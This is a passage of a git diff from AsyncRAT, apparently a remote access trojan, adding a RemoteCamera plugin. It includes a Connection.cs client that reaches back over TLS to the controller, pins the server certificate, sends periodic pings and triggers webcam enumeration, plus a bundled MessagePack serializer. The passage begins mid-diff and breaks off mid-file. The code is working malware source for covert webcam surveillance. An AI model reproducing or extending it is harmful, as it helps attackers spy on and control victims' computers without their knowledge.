rename from AsyncRAT-C#/Client/AForge/Video/IVideoSource.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video/IVideoSource.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video/VideoEvents.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video/VideoEvents.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video/VideoEvents.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video/VideoEvents.cs
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs
new file mode 100644
index 0000000..23c984a
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs
@@ -0,0 +1,211 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient()
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+ Buffer = new byte[4];
+ MS = new MemoryStream();
+ Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+
+ new Thread(() =>
+ {
+ Packet.GetWebcams();
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ Packet.IsOk = false;
+ Tick?.Dispose();
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ MS?.Dispose();
+ }
+ catch { }
+ }
+
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (!TcpClient.Connected || !IsConnected)
+ {
+ IsConnected = false;
+ return;
+ }
+ int recevied = SslClient.EndRead(ar);
+ if (recevied > 0)
+ {
+ MS.Write(Buffer, 0, recevied);
+ if (MS.Length == 4)
+ {
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
+ Debug.WriteLine("/// Plugin Buffersize " + Buffersize.ToString() + " Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize];
+ while (MS.Length != Buffersize)
+ {
+ int rc = SslClient.Read(Buffer, 0, Buffer.Length);
+ if (rc == 0)
+ {
+ IsConnected = false;
+ return;
+ }
+ MS.Write(Buffer, 0, rc);
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ if (MS.Length == Buffersize)
+ {
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
+ }
+ }
+ }
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
